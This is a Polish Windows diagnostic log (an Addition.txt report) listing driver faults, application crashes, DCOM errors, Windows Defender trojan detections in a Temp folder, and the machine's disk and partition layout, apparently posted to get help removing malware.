C:\WINDOWS\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) ==================== Punkty Przywracania systemu ========================= UWAGA: Przywracanie systemu jest wyłączone ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= Name: Sterownik infrastruktury wirtualizacji funkcji Microsoft Hyper-V Description: Sterownik infrastruktury wirtualizacji funkcji Microsoft Hyper-V Class Guid: {4d36e97d-e325-11ce-bfc1-08002be10318} Manufacturer: Microsoft Service: Vid Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31) Resolution: Update the driver Name: AMDA00 Interface Description: AMDA00 Interface Class Guid: {4d36e97d-e325-11ce-bfc1-08002be10318} Manufacturer: ASUSTeK Computer Inc. Service: WUDFRd Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31) Resolution: Update the driver Name: Realtek High Definition Audio Description: Realtek High Definition Audio Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318} Manufacturer: Realtek Service: IntcAzAudAddService Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31) Resolution: Update the driver ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (01/15/2019 03:22:28 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Program OTL.exe w wersji 3.2.69.0 przestał współpracować z systemem Windows i został zamknięty. Aby zobaczyć, czy jest dostępnych więcej informacji dotyczących tego problemu, sprawdź historię problemów w oknie Zabezpieczenia i konserwacja w Panelu sterowania. Identyfikator procesu: 860 Godzina rozpoczęcia: 01d4acdd48280ba7 Godzina zakończenia: 4294967295 Ścieżka aplikacji: F:\Pobrane\OTL.exe Identyfikator raportu: f905b8c5-7a43-4ce2-a6b5-caa38fca3119 Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji powiązanej z pakietem powodującym błąd: Typ zawieszenia: Top level window is idle Error: (01/15/2019 03:02:37 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Program firefox.exe w wersji 64.0.2.6947 przestał współpracować z systemem Windows i został zamknięty. Aby zobaczyć, czy jest dostępnych więcej informacji dotyczących tego problemu, sprawdź historię problemów w oknie Zabezpieczenia i konserwacja w Panelu sterowania. Identyfikator procesu: 1f18 Godzina rozpoczęcia: 01d4acdab060e301 Godzina zakończenia: 10 Ścieżka aplikacji: C:\Program Files\Mozilla Firefox\firefox.exe Identyfikator raportu: de40daed-70b1-48f3-8eae-26c815a07fd1 Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji powiązanej z pakietem powodującym błąd: Typ zawieszenia: Unknown Error: (01/15/2019 02:47:37 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Program firefox.exe w wersji 64.0.2.6947 przestał współpracować z systemem Windows i został zamknięty. Aby zobaczyć, czy jest dostępnych więcej informacji dotyczących tego problemu, sprawdź historię problemów w oknie Zabezpieczenia i konserwacja w Panelu sterowania. Identyfikator procesu: 6cc Godzina rozpoczęcia: 01d4acd8ac77dde6 Godzina zakończenia: 7 Ścieżka aplikacji: C:\Program Files\Mozilla Firefox\firefox.exe Identyfikator raportu: 2167de64-9108-4498-bfb2-30c4f6b2162b Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji powiązanej z pakietem powodującym błąd: Typ zawieszenia: Unknown Error: (01/15/2019 02:43:45 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: RootkitRevealer.exe, wersja: 1.71.0.0, sygnatura czasowa: 0x44e255aa Nazwa modułu powodującego błąd: RootkitRevealer.exe, wersja: 1.71.0.0, sygnatura czasowa: 0x44e255aa Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x000040cd Identyfikator procesu powodującego błąd: 0x2364 Godzina uruchomienia aplikacji powodującej błąd: 0x01d4acd856148fd7 Ścieżka aplikacji powodującej błąd: F:\Pobrane\RootkitRevealer\RootkitRevealer.exe Ścieżka modułu powodującego błąd: F:\Pobrane\RootkitRevealer\RootkitRevealer.exe Identyfikator raportu: 8a1dc1c8-b2d6-4ee1-a808-03a317d81662 Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (01/15/2019 02:43:37 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Program firefox.exe w wersji 64.0.2.6947 przestał współpracować z systemem Windows i został zamknięty. Aby zobaczyć, czy jest dostępnych więcej informacji dotyczących tego problemu, sprawdź historię problemów w oknie Zabezpieczenia i konserwacja w Panelu sterowania. Identyfikator procesu: 2210 Godzina rozpoczęcia: 01d4acd826ce1458 Godzina zakończenia: 4294967295 Ścieżka aplikacji: C:\Program Files\Mozilla Firefox\firefox.exe Identyfikator raportu: 69198c44-202e-4478-b3ad-018ebcc3b87f Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji powiązanej z pakietem powodującym błąd: Typ zawieszenia: Top level window is idle Error: (01/15/2019 02:41:30 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: RootkitRevealer.exe, wersja: 1.71.0.0, sygnatura czasowa: 0x44e255aa Nazwa modułu powodującego błąd: RootkitRevealer.exe, wersja: 1.71.0.0, sygnatura czasowa: 0x44e255aa Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x000040cd Identyfikator procesu powodującego błąd: 0xe50 Godzina uruchomienia aplikacji powodującej błąd: 0x01d4acd80527f8ef Ścieżka aplikacji powodującej błąd: F:\Pobrane\RootkitRevealer\RootkitRevealer.exe Ścieżka modułu powodującego błąd: F:\Pobrane\RootkitRevealer\RootkitRevealer.exe Identyfikator raportu: 28a087f1-f744-4413-bedf-15f3f2365ef0 Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (01/15/2019 02:39:45 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: RootkitRevealer.exe, wersja: 1.71.0.0, sygnatura czasowa: 0x44e255aa Nazwa modułu powodującego błąd: RootkitRevealer.exe, wersja: 1.71.0.0, sygnatura czasowa: 0x44e255aa Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x000040cd Identyfikator procesu powodującego błąd: 0x1304 Godzina uruchomienia aplikacji powodującej błąd: 0x01d4acd7c71a09b0 Ścieżka aplikacji powodującej błąd: C:\Users\PiotriPawel\AppData\Local\Temp\Rar$EXa1036.8712\RootkitRevealer.exe Ścieżka modułu powodującego błąd: C:\Users\PiotriPawel\AppData\Local\Temp\Rar$EXa1036.8712\RootkitRevealer.exe Identyfikator raportu: bb186ab4-17e8-41bd-ae1d-0f8b85c56922 Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (01/15/2019 02:39:33 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: RootkitRevealer.exe, wersja: 1.71.0.0, sygnatura czasowa: 0x44e255aa Nazwa modułu powodującego błąd: RootkitRevealer.exe, wersja: 1.71.0.0, sygnatura czasowa: 0x44e255aa Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x000040cd Identyfikator procesu powodującego błąd: 0x1008 Godzina uruchomienia aplikacji powodującej błąd: 0x01d4acd7be8f0847 Ścieżka aplikacji powodującej błąd: C:\Users\PiotriPawel\AppData\Local\Temp\Rar$EXa1984.7279\RootkitRevealer.exe Ścieżka modułu powodującego błąd: C:\Users\PiotriPawel\AppData\Local\Temp\Rar$EXa1984.7279\RootkitRevealer.exe Identyfikator raportu: 5128167d-5d9d-4aeb-bd9f-dd60a55271f5 Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Dziennik System: ============= Error: (01/15/2019 03:44:59 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-H0L45LA) Description: Model DCOM odebrał błąd 1084 podczas próby uruchomienia usługi ShellHWDetection z argumentami Niedostępny w celu uruchomienia serwera: {DD522ACC-F821-461A-A407-50B198B896DC} Error: (01/15/2019 03:44:32 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-H0L45LA) Description: Model DCOM odebrał błąd 1084 podczas próby uruchomienia usługi ShellHWDetection z argumentami Niedostępny w celu uruchomienia serwera: {DD522ACC-F821-461A-A407-50B198B896DC} Error: (01/15/2019 03:43:04 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-H0L45LA) Description: Model DCOM odebrał błąd 1084 podczas próby uruchomienia usługi ShellHWDetection z argumentami Niedostępny w celu uruchomienia serwera: {DD522ACC-F821-461A-A407-50B198B896DC} Error: (01/15/2019 03:42:20 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-H0L45LA) Description: Model DCOM odebrał błąd 1084 podczas próby uruchomienia usługi ShellHWDetection z argumentami Niedostępny w celu uruchomienia serwera: {DD522ACC-F821-461A-A407-50B198B896DC} Error: (01/15/2019 03:42:19 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-H0L45LA) Description: Model DCOM odebrał błąd 1084 podczas próby uruchomienia usługi camsvc z argumentami Niedostępny w celu uruchomienia serwera: Windows.Internal.CapabilityAccess.CapabilityAccess Error: (01/15/2019 03:42:15 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-H0L45LA) Description: Model DCOM odebrał błąd 1084 podczas próby uruchomienia usługi WSearch z argumentami Niedostępny w celu uruchomienia serwera: {9E175B6D-F52A-11D8-B9A5-505054503030} Error: (01/15/2019 03:42:15 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-H0L45LA) Description: Model DCOM odebrał błąd 1084 podczas próby uruchomienia usługi WSearch z argumentami Niedostępny w celu uruchomienia serwera: {9E175B6D-F52A-11D8-B9A5-505054503030} Error: (01/15/2019 03:42:14 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-H0L45LA) Description: Model DCOM odebrał błąd 1084 podczas próby uruchomienia usługi ShellHWDetection z argumentami Niedostępny w celu uruchomienia serwera: {DD522ACC-F821-461A-A407-50B198B896DC} Windows Defender: =================================== Date: 2019-01-14 14:00:39.200 Description: Skanowanie produktu Program antywirusowy Windows Defender zostało zatrzymane przed ukończeniem. Identyfikator skanowania: {8D649CFF-D2D9-4BAE-9B7B-116268A62DB6} Typ skanowania: Narzędzia chroniące przed złośliwym oprogramowaniem Parametry skanowania: Szybkie skanowanie Użytkownik: DESKTOP-H0L45LA\PiotriPawel Date: 2019-01-14 13:59:54.471 Description: Produkt Program antywirusowy Windows Defender wykrył złośliwe oprogramowanie lub inne potencjalnie niechciane oprogramowanie. Aby uzyskać więcej informacji, zobacz: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Fuery.B!cl&threatid=2147718514&enterprise=0 Nazwa: Trojan:Win32/Fuery.B!cl Identyfikator: 2147718514 Ważność: Poważny Kategoria: Koń trojański Ścieżka: file:_C:\Users\PiotriPawel\AppData\Local\Temp\JSCore.dll\3626\win2k.wim Pochodzenie wykrycia: Komputer lokalny Typ wykrycia: FastPath Źródło wykrycia: Użytkownik Użytkownik: DESKTOP-H0L45LA\PiotriPawel Nazwa procesu: Unknown Wersja podpisu: AV: 1.283.2934.0, AS: 1.283.2934.0, NIS: 1.283.2934.0 Wersja aparatu: AM: 1.1.15500.2, NIS: 1.1.15500.2 Date: 2019-01-13 22:47:11.092 Description: Produkt Program antywirusowy Windows Defender wykrył złośliwe oprogramowanie lub inne potencjalnie niechciane oprogramowanie. Aby uzyskać więcej informacji, zobacz: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Fuerboos.A!cl&threatid=2147723652&enterprise=0 Nazwa: Trojan:Win32/Fuerboos.A!cl Identyfikator: 2147723652 Ważność: Poważny Kategoria: Koń trojański Ścieżka: file:_C:\Users\PiotriPawel\AppData\Local\Temp\JSCore.dll\win2k.wim Pochodzenie wykrycia: Komputer lokalny Typ wykrycia: FastPath Źródło wykrycia: Ochrona w czasie rzeczywistym Użytkownik: DESKTOP-H0L45LA\PiotriPawel Nazwa procesu: C:\Users\PiotriPawel\AppData\Local\Temp\JSCore.dll\z.exe Wersja podpisu: AV: 1.283.2888.0, AS: 1.283.2888.0, NIS: 1.283.2888.0 Wersja aparatu: AM: 1.1.15500.2, NIS: 1.1.15500.2 Date: 2019-01-13 21:17:15.208 Description: Produkt Program antywirusowy Windows Defender wykrył złośliwe oprogramowanie lub inne potencjalnie niechciane oprogramowanie. Aby uzyskać więcej informacji, zobacz: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Fuery.B!cl&threatid=2147718514&enterprise=0 Nazwa: Trojan:Win32/Fuery.B!cl Identyfikator: 2147718514 Ważność: Poważny Kategoria: Koń trojański Ścieżka: file:_C:\Users\PiotriPawel\AppData\Local\Temp\JSCore.dll\win2k.wim Pochodzenie wykrycia: Komputer lokalny Typ wykrycia: FastPath Źródło wykrycia: Ochrona w czasie rzeczywistym Użytkownik: DESKTOP-H0L45LA\PiotriPawel Nazwa procesu: C:\Users\PiotriPawel\AppData\Local\Temp\JSCore.dll\z.exe Wersja podpisu: AV: 1.283.2888.0, AS: 1.283.2888.0, NIS: 1.283.2888.0 Wersja aparatu: AM: 1.1.15500.2, NIS: 1.1.15500.2 Date: 2019-01-07 23:35:02.067 Description: Skanowanie produktu Program antywirusowy Windows Defender zostało zatrzymane przed ukończeniem. Identyfikator skanowania: {48780367-C1F7-4E02-9922-9C3438E667A3} Typ skanowania: Narzędzia chroniące przed złośliwym oprogramowaniem Parametry skanowania: Szybkie skanowanie Użytkownik: ZARZĄDZANIE NT\SYSTEM Date: 2019-01-15 15:42:01.728 Description: Agent ochrony w czasie rzeczywistym produktu Program antywirusowy Windows Defender wykrył błąd i jego uruchomienie nie powiodło się. Funkcja: Przy dostępie Kod błędu: 0x8007043c Opis błędu: Tej usługi nie można uruchomić w trybie awaryjnym Przyczyna: Ochrona przed złośliwym kodem przestała działać z nieznanej przyczyny. W niektórych przypadkach problem można rozwiązać, uruchamiając ponownie usługę. Date: 2019-01-15 15:04:09.350 Description: Agent ochrony w czasie rzeczywistym produktu Program antywirusowy Windows Defender wykrył błąd i jego uruchomienie nie powiodło się. Funkcja: Przy dostępie Kod błędu: 0x8007043c Opis błędu: Tej usługi nie można uruchomić w trybie awaryjnym Przyczyna: Ochrona przed złośliwym kodem przestała działać z nieznanej przyczyny. W niektórych przypadkach problem można rozwiązać, uruchamiając ponownie usługę. Date: 2019-01-15 14:58:11.671 Description: Produkt Program antywirusowy Windows Defender napotkał błąd podczas próby aktualizacji podpisów. Nowa wersja podpisu: Poprzednia wersja podpisu: 1.283.3001.0 Źródło aktualizacji: Serwer usługi Microsoft Update Typ podpisu: Oprogramowanie antywirusowe Typ aktualizacji: Pełne Użytkownik: ZARZĄDZANIE NT\SYSTEM Bieżąca wersja aparatu: Poprzednia wersja aparatu: 1.1.15500.2 Kod błędu: 0x8007043c Opis błędu: Tej usługi nie można uruchomić w trybie awaryjnym Date: 2019-01-15 14:48:10.427 Description: Agent ochrony w czasie rzeczywistym produktu Program antywirusowy Windows Defender wykrył błąd i jego uruchomienie nie powiodło się. Funkcja: Przy dostępie Kod błędu: 0x8007043c Opis błędu: Tej usługi nie można uruchomić w trybie awaryjnym Przyczyna: Ochrona przed złośliwym kodem przestała działać z nieznanej przyczyny. W niektórych przypadkach problem można rozwiązać, uruchamiając ponownie usługę. Date: 2019-01-15 14:32:23.283 Description: Agent ochrony w czasie rzeczywistym produktu Program antywirusowy Windows Defender wykrył błąd i jego uruchomienie nie powiodło się. Funkcja: Przy dostępie Kod błędu: 0x8007043c Opis błędu: Tej usługi nie można uruchomić w trybie awaryjnym Przyczyna: Ochrona przed złośliwym kodem przestała działać z nieznanej przyczyny. W niektórych przypadkach problem można rozwiązać, uruchamiając ponownie usługę. CodeIntegrity: =================================== Date: 2019-01-03 17:59:02.378 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe) attempted to load \Device\HarddiskVolume2\Program Files\NVIDIA Corporation\Ansel\Tools\NvCameraWhitelisting64.dll that did not meet the Store signing level requirements. Date: 2019-01-02 13:31:16.444 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe) attempted to load \Device\HarddiskVolume2\Program Files\NVIDIA Corporation\Ansel\Tools\NvCameraWhitelisting64.dll that did not meet the Store signing level requirements. Date: 2019-01-01 12:59:52.879 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe) attempted to load \Device\HarddiskVolume2\Program Files\NVIDIA Corporation\Ansel\Tools\NvCameraWhitelisting64.dll that did not meet the Store signing level requirements. Date: 2019-01-01 11:33:28.584 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe) attempted to load \Device\HarddiskVolume2\Program Files\NVIDIA Corporation\Ansel\Tools\NvCameraWhitelisting64.dll that did not meet the Store signing level requirements. Date: 2018-12-31 09:58:31.811 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe) attempted to load \Device\HarddiskVolume2\Program Files\NVIDIA Corporation\Ansel\Tools\NvCameraWhitelisting64.dll that did not meet the Store signing level requirements. Date: 2018-12-30 13:12:25.505 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe) attempted to load \Device\HarddiskVolume2\Program Files\NVIDIA Corporation\Ansel\Tools\NvCameraWhitelisting64.dll that did not meet the Store signing level requirements. Date: 2018-12-29 18:30:29.794 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe) attempted to load \Device\HarddiskVolume2\Program Files\NVIDIA Corporation\Ansel\Tools\NvCameraWhitelisting64.dll that did not meet the Store signing level requirements. Date: 2018-12-29 12:48:55.742 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe) attempted to load \Device\HarddiskVolume2\Program Files\NVIDIA Corporation\Ansel\Tools\NvCameraWhitelisting64.dll that did not meet the Store signing level requirements. ==================== Statystyki pamięci =========================== Procesor: Intel(R) Core(TM) i5-4590 CPU @ 3.30GHz Procent pamięci w użyciu: 26% Całkowita pamięć fizyczna: 8134.78 MB Dostępna pamięć fizyczna: 5975.79 MB Całkowita pamięć wirtualna: 10438.78 MB Dostępna pamięć wirtualna: 8596.15 MB ==================== Dyski ================================ Drive c: () (Fixed) (Total:118.65 GB) (Free:31.35 GB) NTFS Drive d: (Programy) (Fixed) (Total:195.21 GB) (Free:190.52 GB) NTFS Drive e: (Gry) (Fixed) (Total:390.62 GB) (Free:305.45 GB) NTFS Drive f: (Piotr i Paweł) (Fixed) (Total:345.57 GB) (Free:134.07 GB) NTFS \\?\Volume{adb2fa11-0000-0000-0000-100000000000}\ (Zastrzeżone przez system) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS \\?\Volume{adb2fa11-0000-0000-0000-e0af1d000000}\ () (Fixed) (Total:0.49 GB) (Free:0.08 GB) NTFS ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (MBR Code: Windows 7/8/10) (Size: 119.2 GB) (Disk ID: ADB2FA11) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=118.6 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=504 MB) - (Type=27) ======================================================== Disk: 1 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: BA824F35) Partition 1: (Not Active) - (Size=100 MB) - (Type=05) Partition 2: (Active) - (Size=195.2 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=390.6 GB) - (Type=07 NTFS) Partition 4: (Not Active) - (Size=345.6 GB) - (Type=07 NTFS) ==================== Koniec Addition.txt ============================